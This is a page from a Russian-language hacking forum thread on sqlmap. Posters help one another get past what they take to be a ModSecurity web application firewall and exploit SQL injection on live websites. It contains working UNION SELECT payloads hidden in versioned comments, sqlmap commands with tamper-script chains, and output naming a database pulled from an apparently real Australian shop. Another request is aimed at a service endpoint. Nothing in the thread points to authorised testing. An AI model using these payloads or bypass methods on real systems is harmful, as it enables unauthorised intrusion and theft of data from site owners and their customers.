HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 115 из 115 « Первая < 1565105 111 112 113 114 115
 
Опции темы Поиск в этой теме Опции просмотра

  #1141  
Старый 06.05.2022, 11:46
exe-world
Guest
Сообщений: n/a
Провел на форуме:
1291

Репутация: 0
По умолчанию
Цитата:
Сообщение от eminlayer7788  
eminlayer7788 said:

what MYSQL version ?
https://medium.com/@drag0n/sqlmap-ta...s-c5a3f5764cb3
version 10.2.43-MariaDB-cll-lve
 
Ответить с цитированием

  #1142  
Старый 06.05.2022, 11:56
exe-world
Guest
Сообщений: n/a
Провел на форуме:
1291

Репутация: 0
По умолчанию
Цитата:
Сообщение от karkajoi  
karkajoi said:

очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода
/threads/425295/
Попробовал как у автора from {f information_schema.tables} блочит 403 выдает и все

просто '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает версия выводится

Пробовал в ручную как у автора тут

Тоже тупо блок может это не модсекьюрите?хотя конечно очень похоже
 
Ответить с цитированием

  #1143  
Старый 06.05.2022, 13:34
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию
Цитата:
Сообщение от exe-world  
exe-world said:

version 10.2.43-MariaDB-cll-lve
test versionedkeywords,between,unionalltounion tamper scripts together
 
Ответить с цитированием

  #1144  
Старый 06.05.2022, 15:00
exe-world
Guest
Сообщений: n/a
Провел на форуме:
1291

Репутация: 0
По умолчанию
Цитата:
Сообщение от eminlayer7788  
eminlayer7788 said:

test versionedkeywords,between,unionalltounion tamper scripts together
[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable

[13:53:45] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times

К сожалению tamper не помог
 
Ответить с цитированием

  #1145  
Старый 06.05.2022, 18:37
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию
Цитата:
Сообщение от exe-world  
exe-world said:

[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
[13:53:45] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times
К сожалению tamper не помог
send me your target link via pm
 
Ответить с цитированием

  #1146  
Старый 07.05.2022, 12:04
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию
Цитата:
Сообщение от exe-world  
exe-world said:

Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
.SpoilerTarget" type="button">Spoiler: sqlmap payload
python3 sqlmap.py -u "https://mkeducationalsupplies.com.au...productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,spa ce2comment,unionalltounion --fresh-queries

available databases [1]:
[*] mkeducat_books2019
 
Ответить с цитированием

  #1147  
Старый 18.05.2022, 14:26
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию
What is wrong in request ?

python3 sqlmap.py -u "http://stat.com/service.php" -p 'type' --risk="3" --level="3" --method="POST" --data='{"appFrom":"","appId":"","appName":"City","m odule":"install-broadcast","op":"setup","packageAppName":"ar.ity", "position":"","type":"0","action":"postyyt","channelId":"cdy5e1e1a"," mac":"F4:9y3:9F:F8:2A:80","marketVersion":"launche r_5.0.8","userName":"-1","version":"6.2.1"}' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --headers="Host:stat.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nConnection:Close\nContent-Type:application/json;charset=UTF-8" --dbms="MySQL" --batch

[05:55:43] [CRITICAL] all testable parameters you provided are not present within the given request data #5108


P.S also checked "type" and 'type' in -p and in request data

P.S.S sqlmap -r request.txt doesn't work in this case ( and this payload workable, because other scanner can execute sql query with this payload
 
Ответить с цитированием
Ответ
Страница 115 из 115 « Первая < 1565105 111 112 113 114 115



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ